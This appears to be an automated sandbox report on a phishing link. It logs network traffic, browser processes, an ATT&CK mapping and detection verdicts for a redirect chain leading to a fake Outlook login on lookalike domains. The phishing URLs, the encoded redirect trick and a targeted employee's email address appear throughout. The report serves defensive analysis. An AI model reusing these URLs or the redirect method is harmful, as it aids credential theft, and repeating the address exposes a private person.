Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jun 2024 15:59:09 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: do/Wq04cDmxXxVIyweD1hg==$0zXlnWt/iwCCntjjEPwe3w==Server: cloudflareCF-RAY: 897534445d6418f6-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jun 2024 15:59:26 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: iQhvRmF0HqjJLCWQ9FE0vQ==$h9sPSsQwtRrnh+C/Ziij+Q==Server: cloudflareCF-RAY: 897534b0cc6943c9-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateSet-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsP3P: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 047f0aef-003b-4f76-9df4-885796bd5600x-ms-ests-server: 2.1.18298.5 - FRC ProdSlicesnel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.PReferrer-Policy: strict-origin-when-cross-originDate: Fri, 21 Jun 2024 15:59:33 GMTConnection: closeContent-Length: 0Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jun 2024 15:58:54 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: chromecache_96.2.dr	String found in binary or memory: http://github.com/jquery/globalize
Source: chromecache_123.2.dr	String found in binary or memory: http://knockoutjs.com/
Source: chromecache_123.2.dr	String found in binary or memory: http://www.json.org/json2.js
Source: chromecache_123.2.dr	String found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
Source: chromecache_106.2.dr	String found in binary or memory: https://account.live.com/resetpassword.aspx
Source: chromecache_123.2.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.analytics-web-2.min.js
Source: chromecache_100.2.dr	String found in binary or memory: https://login.microsoftonline.com
Source: chromecache_100.2.dr	String found in binary or memory: https://login.windows-ppe.net

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49746 version: TLS 1.2

Source: classification engine

Classification label: mal80.phis.win@23/109@34/12

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2052,i,16891363818736388635,6510281300495793530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2052,i,16891363818736388635,6510281300495793530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Drive-by Compromise	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379	0%	Avira URL Cloud	safe
https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Source	Detection	Scanner	Label
http://knockoutjs.com/	0%	URL Reputation	safe
https://login.windows-ppe.net	0%	URL Reputation	safe
https://login.microsoftonline.com	0%	URL Reputation	safe
http://www.opensource.org/licenses/mit-license.php)	0%	URL Reputation	safe
https://ipinfo.io/	0%	URL Reputation	safe
https://webnnicuttnortheastusa.com/?qrc=lawrence.france%40cabinetworksgroup.com	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback	0%	Avira URL Cloud	safe
http://kenfong.com/favicon.ico	0%	Avira URL Cloud	safe
https://webnnicuttnortheastusa.com/favicon.ico	0%	Avira URL Cloud	safe
https://venicuttnortheastusa.com/favicon.ico	0%	Avira URL Cloud	safe
http://github.com/jquery/globalize	0%	Avira URL Cloud	safe
https://js.monitor.azure.com/scripts/c/ms.analytics-web-2.min.js	0%	Avira URL Cloud	safe
https://autologon.microsoftazuread-sso.com/cabinetworksgroup.com/winauth/ssoprobe?client-request-id=d9a3f2e3-2164-d85d-3b2e-287dc34359ee&_=1718985578804	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/89753409dd24c413/1718985542216/9dfeb1619e2d4256adeded2d3a314ce177c6630fc10756bc799dd97c0ee0fe89/kMSECQtSKPC8EFA	0%	Avira URL Cloud	safe
https://webnnicuttnortheastusa.com/owa/?login_hint=lawrence.france%40cabinetworksgroup.com	0%	Avira URL Cloud	safe
http://www.json.org/json2.js	0%	Avira URL Cloud	safe
https://venicuttnortheastusa.com/?lbkwmykb&qrc=lawrence.france@cabinetworksgroup.com	0%	Avira URL Cloud	safe
https://webnnicuttnortheastusa.com/common/instrumentation/dssostatus	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D	0%	Avira URL Cloud	safe
https://webnnicuttnortheastusa.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3dlYm5uaWN1dHRub3J0aGVhc3R1c2EuY29tLyIsImRvbWFpbiI6IndlYm5uaWN1dHRub3J0aGVhc3R1c2EuY29tIiwia2V5IjoiTm1YcDJ4Tm9uY3JBIiwicXJjIjoibGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbSIsImlhdCI6MTcxODk4NTU3NywiZXhwIjoxNzE4OTg1Njk3fQ.HykXssHfF_M4UV6XA1brZjWnq3CfmkAs4Wo7LDtvRyM	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1948751740:1718982784:WDeBEXsU0BuhHpcRHj_Qz0Y1LR73mHniYIkcolTqRHE/89753409dd24c413/1eefe65da7da1cb	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=89753409dd24c413	0%	Avira URL Cloud	safe
https://account.live.com/resetpassword.aspx	0%	Avira URL Cloud	safe
https://m.exactag.com/ai.aspx?tc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41kenfong.com%2Fwinner%2F54799%2F%2FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/89753409dd24c413/1718985542215/NHJ4YjgTp1IBEyq	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/turnstile/v0/b/c7e29c8c8b6e/api.js	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0014.t-0009.t-msedge.net	13.107.246.42	true	false	unknown
kenfong.com	69.49.245.172	true	false	unknown
webnnicuttnortheastusa.com	89.23.108.32	true	true	unknown
challenges.cloudflare.com	104.17.2.184	true	false	unknown
sni1gl.wpc.omegacdn.net	152.199.21.175	true	false	unknown
www.google.com	172.217.18.4	true	false	unknown
baconredirects-elb-1vu8uzbbqecyf-1056340931.eu-west-1.elb.amazonaws.com	54.72.98.24	true	false	unknown
venicuttnortheastusa.com	89.23.108.32	true	false	unknown
HHN-efz.ms-acdc.office.com	52.98.241.178	true	false	unknown
tp-emea.exactag.com	85.14.248.71	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
autologon.microsoftazuread-sso.com	40.126.32.140	true	false	unknown
r4.res.office365.com	unknown	unknown	false	unknown
aadcdn.msftauth.net	unknown	unknown	false	unknown
ajax.aspnetcdn.com	unknown	unknown	false	unknown
m.exactag.com	unknown	unknown	false	unknown
outlook.office365.com	unknown	unknown	false	unknown
passwordreset.microsoftonline.com	unknown	unknown	false	unknown
5rve2bms.r.eu-west-1.awstrack.me	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://autologon.microsoftazuread-sso.com/cabinetworksgroup.com/winauth/ssoprobe?client-request-id=d9a3f2e3-2164-d85d-3b2e-287dc34359ee&_=1718985578804	false	Avira URL Cloud: safe	unknown
https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379	true		unknown
https://webnnicuttnortheastusa.com/?qrc=lawrence.france%40cabinetworksgroup.com	true	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/89753409dd24c413/1718985542216/9dfeb1619e2d4256adeded2d3a314ce177c6630fc10756bc799dd97c0ee0fe89/kMSECQtSKPC8EFA	false	Avira URL Cloud: safe	unknown
https://outlook.office365.com/owa/prefetch.aspx	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal	false		unknown
https://webnnicuttnortheastusa.com/owa/?login_hint=lawrence.france%40cabinetworksgroup.com	true	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback	false	Avira URL Cloud: safe	unknown
http://kenfong.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://venicuttnortheastusa.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://webnnicuttnortheastusa.com/favicon.ico	true	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=89753409dd24c413	false	Avira URL Cloud: safe	unknown
https://m.exactag.com/ai.aspx?tc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41kenfong.com%2Fwinner%2F54799%2F%2FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/89753409dd24c413/1718985542215/NHJ4YjgTp1IBEyq	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/	false	URL Reputation: safe	unknown
http://kenfong.com/winner/54799//bGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==	false		unknown
https://venicuttnortheastusa.com/?lbkwmykb&qrc=lawrence.france@cabinetworksgroup.com	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D	false	Avira URL Cloud: safe	unknown
https://venicuttnortheastusa.com/?lbkwmykb=446d7ae8e2b0026c09e952c1046f26eb20f17c5c86fdb89bf6a6962aa75a09f904517ec41333b61ba7f0802aa8928dcdb1650ecd8ee69f3c108083478cb5684c&qrc=lawrence.france%40cabinetworksgroup.com	false		unknown
https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2fwebnnicuttnortheastusa.com%2fcommon%2freprocess%3fctx%3drQQIARAAjZE7bNNgFIX9x6lpS6FRWdiACCRUcPxOnKBKJE7T5tW8VIiLquD4kTiJ_bu286yyMLEgCiOIgYcYOkEnxATq1qkjlAWJpepQQaeOJGJhgzOce6Sre4fzzaNUgIpcJf-IxseOk5pG4bI6Tn_Jnpv2_Th5_VW5sv7lVuD6cFcQj7fBpbrrWk6EIGDbbUHYDEBN02U1IEODgF2J-ADAPgCHADz1XGtJXVs1R0vNlkbjtixVdVN1u9BuOjUbtq3x1bYnFGR4juV4mgmRLMmFSZYKyHyIZaigijMUreIsR2k4z_IhXGI1UqG0YJWmmQPPbC7aduv02KCtD9QTz5QGbaNiQcd9hj4HcdGNxZ1kbTEaizF4uqjAxQQF8720KOp3lpKZmNFhO_WewTVKcrYsqmZUlOuWPjBqXWnVhbGa3RT6ulEo9Ck3kdjYSK_Ek6loIyWIfMpsZNaKJXOlR7qDUDmIV5nyCqctp7lq3e3YiliweiW-ny3Xc0K5nMsUJcatUNRaxeybq5UCv43-F4QdFBt1ZEBzD8WgpZq6su8F373gyDtDopHJyWkfchG5jJx6wauJEa_O8ur9b48fCI_eX9jN_1pC9iYISg2V6govJmyim8kWc-12XlcZVgyHlgotsZ8ULYMoCfJgkc4ucBFqCwNbGPYRm5pEfYgfFfLUIQZ-YuDhGeTj1L_g758FBzPsNCa3JN1w5uY3_bpScWFTNf2RTX_PcCqyPE4dqdVWHX_knn_0378-HA4_nUNOzz95-eLtzuc3x8tHszd1vZgh6VhayHSYGm8yhGLdWGPvOp0wy8tM2qg25GB3I06kwvLCOx_yGw2&mkt=en-US&hosted=0&device_platform=Windows+10	false		unknown
https://webnnicuttnortheastusa.com/common/instrumentation/dssostatus	true	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1948751740:1718982784:WDeBEXsU0BuhHpcRHj_Qz0Y1LR73mHniYIkcolTqRHE/89753409dd24c413/1eefe65da7da1cb	false	Avira URL Cloud: safe	unknown
